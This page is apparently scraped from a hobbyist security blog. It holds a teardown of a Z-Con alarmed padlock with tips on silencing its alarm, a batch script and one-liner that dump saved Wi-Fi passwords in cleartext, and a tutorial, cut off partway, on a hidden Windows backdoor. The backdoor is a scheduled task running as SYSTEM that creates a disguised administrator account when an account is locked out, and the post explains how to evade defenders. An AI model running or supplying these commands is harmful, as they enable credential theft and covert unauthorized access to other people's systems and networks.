<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTO4bUVFyxmdQPg31pd_hyphenhyphennugu3lwsY3Bn1a052DPkRNOi-2BfXx4nMB3bjLxvtYhkrKYnloxvo3AieZobSHXgQVhFz6t6SipOzsGG1h8SYzrMsmn_mrUT7ED7WU9tfe7tHUQHnKvZZk4/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTO4bUVFyxmdQPg31pd_hyphenhyphennugu3lwsY3Bn1a052DPkRNOi-2BfXx4nMB3bjLxvtYhkrKYnloxvo3AieZobSHXgQVhFz6t6SipOzsGG1h8SYzrMsmn_mrUT7ED7WU9tfe7tHUQHnKvZZk4/s320/6.png" width="320" /></a></div>
Above: A closeup of the "back" of the circuit board. The white wrapped part is a trembler switch that activates the alarm if the lock is moved too much. Is is a metal tube hooked to ground with a delicate spring inside hooked to positive that will jiggle, come into contact with the tube and complete the circuit activating the alarm.<br />
<br />
Not pictured: There is a magnetic reed switch on the positive cable that extends upwards into the lock. There is also a magnet on the extension from the back of the lock cylinder so that when the lock is turned to the alarm (little speaker picture) setting it closes the circuit and then allows the trembler to set off the alarm if activated.<br />
<br />
So that's that for the alarm part of the lock. You can muffle it with silly putty stuffed into the speaker holes, or you can unscrew the bottom, remove the plate, then take your choice of methods to disable the circuitry.<br />
<br />
<br />
Let's take a look at the Z-Con lock core.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyxgzEapwSWi-mSA5QPQM9gy6QRnDMb5qvtwcuL8Loux3ox0iPAiZdamA2YC0faTihgdZbR2uDfG_a2zPMzcFqa531HI-UnPF8iU0aW3sVPp2VSOsGlnA1Wm8289esjtx5oEJ36HTVckQ/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyxgzEapwSWi-mSA5QPQM9gy6QRnDMb5qvtwcuL8Loux3ox0iPAiZdamA2YC0faTihgdZbR2uDfG_a2zPMzcFqa531HI-UnPF8iU0aW3sVPp2VSOsGlnA1Wm8289esjtx5oEJ36HTVckQ/s320/7.png" width="320" /></a></div>
Here it is still in the lock body. There is a bit of a funnel piece that you have to drill out the retaining plug, just to the right of the lock core. Then it is also held in place by a lock ring. I could not find a way to remove the funnel without permanently damaging the lock body. I kind of get the feeling they really don't want you to take it apart.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-f4TJC03UPgziKG4NDaggEmyOaFZ6jGsr9MBgVOTbz6O63l3Tr6lP7yq8hfTHYAkb3lfvl_9QCSplNQGV1J5KfLz3SxKxpPqwkx3nQc8QXTlNbACCYQ-B3vocDfI3sl4DDCg3k0XsPdc/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-f4TJC03UPgziKG4NDaggEmyOaFZ6jGsr9MBgVOTbz6O63l3Tr6lP7yq8hfTHYAkb3lfvl_9QCSplNQGV1J5KfLz3SxKxpPqwkx3nQc8QXTlNbACCYQ-B3vocDfI3sl4DDCg3k0XsPdc/s320/8.png" width="246" /></a></div>
<br />
<br />
<br />
<br />
So here's the actual lock core. I've drawn 3 lines to show the way the key lines up inside the lock. Green the lock is open, the key is not removable in this position.<br />
Yellow the lock is in the normal locked position, notice the extra cut out extensions, this allows the key to be inserted and extracted.<br />
Red the lock is in the locked and alarmed position, again notice the extra cut out extensions allowing the key to be inserted and removed from this position.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0d-2IvlVQQJKhV-69U9IKslwoFD34i7PL33jvTQDfhd0FCfh5N76wIZFKu4gh6j7LKloOh9W_6ZBWLLQ-g0P6C1xbEgTvMQ390juxBEksQMVcrRxVSaqMUGqIdws8dbNzfThd4Vlq6Oo/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0d-2IvlVQQJKhV-69U9IKslwoFD34i7PL33jvTQDfhd0FCfh5N76wIZFKu4gh6j7LKloOh9W_6ZBWLLQ-g0P6C1xbEgTvMQ390juxBEksQMVcrRxVSaqMUGqIdws8dbNzfThd4Vlq6Oo/s320/12.png" width="261" /></a></div>
Here is the back of the lock core. The red arrows point to lock ring that keep the inner core and the outer shell together.<br />
<br />
<br />
The inner core is made of 2 parts (minus the springs and wards)<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxMqWMJLH8_scMBLXBfG0LQiBPkoAIGvztlCdRHAA54wtEPwurWmPAUsjhPr0NPqOU8jv3P9w-Z3CbOLA8eDoMPeEAbxZWbwkPiPCacjDCQNbzHlU8VeDOpgN-x125__G50QGfbeL3op0/s1600/12-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxMqWMJLH8_scMBLXBfG0LQiBPkoAIGvztlCdRHAA54wtEPwurWmPAUsjhPr0NPqOU8jv3P9w-Z3CbOLA8eDoMPeEAbxZWbwkPiPCacjDCQNbzHlU8VeDOpgN-x125__G50QGfbeL3op0/s1600/12-1.png" /></a></div>
<br />
Here is the point of interaction between the top of the inner core and the key.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8P3bOGCVVbrtaPFyC2HKdwG3JR7oi3QJCzu-bCTbN5mhYOHR8dshE5_Ko4dWwrZHlZsk_Ri5n2FJrt1KTv8d8bN32UZeuIDbnDcYbYO46sOHzy4kUnEVFZWNL1EN3RdCDreh5HCKTPE/s1600/14.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8P3bOGCVVbrtaPFyC2HKdwG3JR7oi3QJCzu-bCTbN5mhYOHR8dshE5_Ko4dWwrZHlZsk_Ri5n2FJrt1KTv8d8bN32UZeuIDbnDcYbYO46sOHzy4kUnEVFZWNL1EN3RdCDreh5HCKTPE/s320/14.png" width="211" /></a></div>
<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmwr2wW5ykmLvMW-M4w2mnT8WUOgrQkFeknXAZlr5KKtAynAqMsG0hCPmx-A5biLNe65Ld67dpztTNrhi7LUn-rz6mUCmEWeVgx9jEQtzvTgBIHQ1rG1yoG2t3eS6uGjICaWtjFIDsj0s/s1600/13.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmwr2wW5ykmLvMW-M4w2mnT8WUOgrQkFeknXAZlr5KKtAynAqMsG0hCPmx-A5biLNe65Ld67dpztTNrhi7LUn-rz6mUCmEWeVgx9jEQtzvTgBIHQ1rG1yoG2t3eS6uGjICaWtjFIDsj0s/s1600/13.png" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Here is the bottom of the inner core. you can see the springs and the 3 moving wards at the bottom.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s1600/9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s320/9.png" width="130" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagcsIhHyC7w0mm2L-COJ5zHTM3_6t_zy9pr6G24imvPaS-UvoatKyIDujbGOw2fbklciGr0X-xjp-JhrM4P2Y2WqRTpsl4RqKkmLJpDP6tlMgnkzEIBh5Eu5zf64r7kv4jsN9ZvxGMPM/s1600/11.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjagcsIhHyC7w0mm2L-COJ5zHTM3_6t_zy9pr6G24imvPaS-UvoatKyIDujbGOw2fbklciGr0X-xjp-JhrM4P2Y2WqRTpsl4RqKkmLJpDP6tlMgnkzEIBh5Eu5zf64r7kv4jsN9ZvxGMPM/s320/11.png" width="288" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Above left is the lock inner core with the key inserted. Note the 3 black extensions, these are the moving wards. <br />
Above right is the lock outer cover. The red arrows show the grooves that when the wards align properly allow the lock to turn. The green arrow shows the groove for the lock ring that hold the two parts of the lock together.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt6YeluVYbVUE77qk-oo6DipqxlQPyj6U0eCGlQTspixDfcVGWTXdIkHPpoBTFuuRp6WzTYayJNtEJ-pLJtYzH2TZvz7JAYbTti6aZwAIiA7D7_zApczx9XiAmv9n5-Be0ZF1gmP8a8k4/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt6YeluVYbVUE77qk-oo6DipqxlQPyj6U0eCGlQTspixDfcVGWTXdIkHPpoBTFuuRp6WzTYayJNtEJ-pLJtYzH2TZvz7JAYbTti6aZwAIiA7D7_zApczx9XiAmv9n5-Be0ZF1gmP8a8k4/s320/16.png" width="320" /></a></div>
Here is the inner core fully disassembled<br />
Top left core shell<br />
Top middle inner core lower<br />
Top right inner core upper<br />
<br />
The 3 black plastic items in the lower right are the moving wards. Note
the difference in the diameter of the hole in the middle of them. These
correspond to the different diameters of the key, which then align them
with the grooves in the core shell and allow the inner core to move thus
turning the extension on the top of the lock core (not pictured) that
allows the ball bearings to retract and the shackle to open. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0bzdtm9qLrJOHyxlRI4WqlkiuG9Zcn1Wml4SKXgqDMkoJxfjZxOTwjl7aLchcGCj2-7o_cggixFF71AsbylmG9G35fv_21Wb4tX_OA5Co6LDH8_x8uPMaP4jR18pHdXxO-cP8nWYwVY/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0bzdtm9qLrJOHyxlRI4WqlkiuG9Zcn1Wml4SKXgqDMkoJxfjZxOTwjl7aLchcGCj2-7o_cggixFF71AsbylmG9G35fv_21Wb4tX_OA5Co6LDH8_x8uPMaP4jR18pHdXxO-cP8nWYwVY/s1600/15.jpg" /></a></div>
Inner core with all springs, wards, and upper portion removed.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegUhrgStyh22U7YjnymyFOQcYOwG2hzqGJIEm0E0rTGXl1pz6MKtJy4EVXxk7EBdW-U8n7cubUOjd4XB-hKX4Mje06Em08xWD_UFsQB2WkK9MBmB4kiYoJxhawoQkkUdgNh5F_5sa86M/s1600/9-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegUhrgStyh22U7YjnymyFOQcYOwG2hzqGJIEm0E0rTGXl1pz6MKtJy4EVXxk7EBdW-U8n7cubUOjd4XB-hKX4Mje06Em08xWD_UFsQB2WkK9MBmB4kiYoJxhawoQkkUdgNh5F_5sa86M/s320/9-2.png" width="169" /></a></div>
This is a Z-Con key (not mine). The blue arrow is pointing to the ward that keeps the key in the lock when in the open position and also turns the lower portion of the inner core of the lock.<br />
The red arrows point to the resting locations for the black plastic moving wards. See that the diameter of the holes in the plastic rings corresponds with the diameter and steps of the key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdHUeUsG6CLC50pXjNWVujJXJ3e7yKE-T_QpLwt5jvdVLV_e3KMEgv4USrc5DaU6Bmrbr2m3yYnuf6ptJDVf12u_pWb7CkR2KX3r5YrcAscs56MAHx48-EGjZ3hO23Y8mGqQ58hEJKg/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JdHUeUsG6CLC50pXjNWVujJXJ3e7yKE-T_QpLwt5jvdVLV_e3KMEgv4USrc5DaU6Bmrbr2m3yYnuf6ptJDVf12u_pWb7CkR2KX3r5YrcAscs56MAHx48-EGjZ3hO23Y8mGqQ58hEJKg/s320/10.png" width="114" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEFKBLJ_VYo6a5tciiG_krEezVIxOT4KlfNHJfZGztf_92beTQNbhyphenhypheneONPUNwxMhcIrTmiMz4KrOMZkLSmhAM_I5kDalLhmNUhk-hVHBQLtD5ShF_KGtt1lK2Ayw6uXzgR4QsEyLE_HMw/s320/9.png" width="130" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
So that's how they work.<br />
<br />
Now for how to pick them...<br />
<br />
I've got some ideas but nothing I've really tested yet. As far as a straight up bypass I don't see anything that would work.<br />
<br />
The keys almost have to have a very low entropy as far as possible bitting setups. A unique lock would require not only a unique key to be lathed but also a unique core shell with matching inner grooves.<br />
My assumption would be that only 1 of the wards (the lowest) actually is movable as far as the bitting is concerned, the other 2 are static for all keys. I think this because the lowest ward is the only one that doesn't sit on a lathed ledge it sits on a couple of ears that stick out. But I don't have access to any other Z-Con locks and keys so I can't really say for sure.<br />
<br />
I'll be posting the exact measurements of the key in a few days so others can compare and we can find out just exactly how many unique keys there are for this type of lock and possibly make a pick for it.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-40248120702165955362015-08-17T09:09:00.001-10:002015-08-17T11:31:37.579-10:00Dumping Wireless Passwords from Windows Machines (win7 & win8 tested; win10 not tested) using netshHere's how to dump all the wifi passwords from a windows machine using builtin tools:<br />
Windows 7 - Tested Succesfully<br />
Windows 8 - Tested Succesfully<br />
Windows 10 - Not Tested<br />
<br />
-=batch file=-<br />
@echo off<br />
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (<br />
netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" echo.<br />
)<br />
pause > nul<br />
<br />
<br />
How it works:<br />
When doing a netsh wlan show profiles we get all the wireless profiles for the machine, but we also get a lot of other garbage that gets in the way. Piping it to find "Profile " cleans that up to only what we want. Notice the space after Profile in the find command. Then we can delimit on : and space character to get it down to just the wireless ssid's.<br />
<br />
Now that we have just the ssid's, aka Profiles in netsh terms, we can query them to get various information from them, mostly we're just concerned with SSID, Cipher (encryption) and Key Content (the password). Using findstr we can search for multiple terms in one go, however the term Number of SSID's is also in the information so we use a find /v (do not match) to strip that out. Echo. inserts a blank line to keep things readable.<br />
<br />
You'll likely want to put some redirects to save that to a text file, remote server share, something you can hold onto it with.<br />
<br />
-=The one liner =-<br />
I also wrote up a one liner to use in the event you can't run a batch file:<br />
<br />
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on<br />
<br />
This one liner outputs nice clean output by first clearing the screen (cls), echoing a bank line (echo.), the running through the same script but keeping the echo feature off and then conveniently turning it back on at the end of the script.<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-26639903796583834952015-03-11T11:53:00.000-10:002015-03-11T11:53:32.220-10:00Windows Event Log Driven Back DoorsWell it's about time to get that white hat a little dirty.<br />
<br />
None of this is original ideas, I've heard of this being done in theory of "oh, you know what would make a good persistence idea?" but I've never actually seen anything implement it. So I decided to do that.<br />
*EDIT In fact this is exactly where I saw it first. <a href="https://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+4/15460" target="_blank">SANS Wipe the HardDrive</a> written by Mark Baggett and inspired by Jake Williams.<br />
<br />
Let us take this from the metaphysical to the physical. <br />
<br />
I was red teaming a bit for an experiential learning class. I needed to create a backup method of maintaining access to a domain. I didn't want anything running constantly, I didn't want to leave files on the disk. <br />
<br />
I have been utilizing Event ID driven scheduled tasks at work for some monitoring and logging of service creation, user creation/deletion, users being added to security groups, little things that are really helpful to have an eye on and will give you a huge leg up in the event of malware infections and penetration incidents and just in general to have a better idea of what's going on in your domain. This is especially effective if you setup an event log gatherer and use subscriptions pushed out to all computers on the domain. Anyways, I decided to write a scheduled task that will trigger in the event of an account being locked out. This is something I can trigger externally from an OWA page, PPTP portal, corporate web page, anything that has a windows based login method that checks against AD. <br />
<br />
So here's our command:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user Backdoor 1R3AlG00dP@55w0rd /add /y /active:yes >> nul & net localgroup administrators Backdoor /add > nul & net user Backdoor /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span><br />
<br />
<span style="font-family: inherit;">Let<span style="font-family: inherit;">s ste<span style="font-family: inherit;">p throug<span style="font-family: inherit;">h the command:</span></span></span></span><br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: "Courier New",Courier,monospace;">sch</span><span style="font-family: inherit;"><span style="font-family: "Courier New",Courier,monospace;">tasks /create</span> - Create a new scheduled task</span></span></span></span></span></span><br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;"><span style="font-family: inherit;">/<span style="font-family: "Courier New",Courier,monospace;">tn </span><span style="font-family: inherit;"><span style="font-family: "Courier New",Courier,monospace;">"Mic</span><span style="font-family: inherit;"><span style="font-family: "Courier New",Courier,monospace;">rosoft\Wind</span><span style="font-family: inherit;"><span style="font-family: "Courier New",Courier,monospace;">ows\LocalEventLogRotate"</span> - <span style="font-family: Times,"Times New Roman",serif;">The name of the task will be LocalEventLogRotate, but this is a bit interesting when I first found this out. In the modern Task Scheduler there are several subfolders that have tasks in them. Not very likely that someone is going to drill down into them to check for tasks. You can make the path whatever you want *needs citation and Task Scheduler will make the directory structure.</span></span></span></span><span style="font-family: Times,"Times New Roman",serif;"> </span></span></span><span style="font-family: Times,"Times New Roman",serif;"> </span></span></span></span></span><span style="font-family: Times,"Times New Roman",serif;">Nifty right? So this task will show up in Microsoft\Windows sub folder. No point in making it really easy to find right?</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">/tr "\"cmd.exe\" /k net user Backdoor 1R3AlG00dP@55w0rd /add /y /active:yes > nul & net localgroup administrators
Backdoor /add > nul & net user Backdoor /comment:\"Built-in
account for Backdooring your network suckers\" > nul & exit" - <span style="font-family: Times,"Times New Roman",serif;">This is the meat here, our command that will execute when the event occurs. So, double quotes are an issue that will need to be dealt with. We want cmd.exe to execute everything else as an argument so we need to enclose that in quotes, but we also have to have our arguments in quotes since there are spaces, but we can't just do this: "cmd.exe" "/k etc..." because then that's 2 different things and it will syntax error out as an invalid argument. So we need to escape wherever we have double quotes inside of the outer most double quotes with the \. Since we're going with the goal of not having extra files on the disk we need to make this command a one liner. In batch you can use the & sign to string commands together. & = run the following command no matter the success / failure of the previous command. && = run the following command ONLY if the previous command was successful. In this instance the command will create a user named Backdoor with password 1R3AlG00dP@55w0rd make sure the account is active (/active:yes)<span style="font-family: "Courier New", Courier, monospace;">. </span></span></span><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Also
note that if your password is going to be 14 characters or over you
need to add the /y command to the net user add otherwise it will hang
forever in purgatory waiting for a response. Bad thing to have happen to
your last resort backdoor. </span></span>Then it adds that account to the local administrators group, then adds a comment to the user account to kind of disguise it a bit like the other built-in account windows creates. Take the extra time to make your stuff look like it belongs and it's more likely to get past the people hunting for it at first glance which may well provide you the extra 5 minutes you need to get the job done.</span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/f - <span style="font-family: Times,"Times New Roman",serif;">Force the task to be created even if a task with the same name already exists.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/ru system - <span style="font-family: Times,"Times New Roman",serif;">run as the SYSTEM user. This is important as if you don't have a valid account and password to use that's active you can't make the task run unless that user is logged in when it happens. Run as system = task executes every time the Event ID is triggered, not just when the user that created the task is logged in.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/sc onevent - <span style="font-family: Times,"Times New Roman",serif;">When to execute the task, in this instance we want to have it execute when a particular event happens.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/ec Security - <span style="font-family: Times,"Times New Roman",serif;">Which event log to follow to look for the Event ID in question. So if you need to follow a different Event ID and it occurs in the Application or System or whatever event log, you'll need to change that to match.</span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;">/mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span> - Modifier for the <span style="font-family: "Courier New",Courier,monospace;">onevent</span> trigger. This is were we define exactly what event we're looking for. It's <i>kind of </i>intuitive when you look at it. We're looking for EventID 4740 (user account locked out) logged by the Microsoft Windows Security Auditing provider. If you can't figure out how to modify that to be exactly what you want, open the event log, find the event you want to trigger on, right click, attach task to this event. skip though, choose execute a program, cmd.exe. Then go into Task Scheduler Library\Event Viewer Tasks, find your newly created task, right click it, export, save it, and open the XML file. Viola there's the exact string you need to copy there in the <Subscription> tag.</span></span><br />
<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Cool, we have a task that will run and all we have to do is lockout any account on the target computer, or if we managed to install this on a DC any account on the domain.</span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">....wait a minute, that's going to get executed more often than we may intend. That could be bad if you want it to stay under wraps until the trap is ready to spring. So how do we nail it down to if a SPECIFIC account gets locked out??</span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Our built-in friend wevtutil.exe is the man for the job here. Windows Event Utility can read through the event logs and output specific EventID selections.</span></span><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"> For this instance what we need to do is the following:</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]"</span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">qe security</span> - query the security event log</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">/rd:true</span> - reverse direction, read from newest to oldest</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">/F:text</span> - output it in text format</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">/c:1</span> - Find only the last 1 events (most recent since we have rd set to true)</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">That will output the last instance of an account getting locked out. It will look something similar to this, in this instance it's from a domain controller, it will look very similar just different names on a non domain controller:</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New",Courier,monospace;">Event[0]:<br /> Log Name: Security<br /> Source: Microsoft-Windows-Security-Auditing<br /> Date: 2015-03-11T10:12:52.499<br /> Event ID: 4740<br /> Task: User Account Management<br /> Level: Information<br /> Opcode: Info<br /> Keyword: Audit Success<br /> User: N/A<br /> User Name: N/A<br /> Computer: Domain.Controller.fake.internal<br /> Description:<br />A user account was locked out.<br /><br />Subject:<br /> Security ID: S-1-5-18<br /> Account Name: Domain.Controller$<br /> Account Domain: fake<br /> Logon ID: 0x3e7<br /><br />Account That Was Locked Out:<br /> Security ID: S-1-5-21-561012550-38641HK9414-249823312-7894</span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"> Account Name: <span style="font-family: Times, "Times New Roman", serif;"></span>Backupexec<br /><br />Additional Information:<br /> Caller Computer Name: Someserverorworkstation</span></span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Okay, that's a lot of info but we really only need the Account Name. So we pipe it to find:</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]" | find /i "account name"</span></span></span><br />
<br />
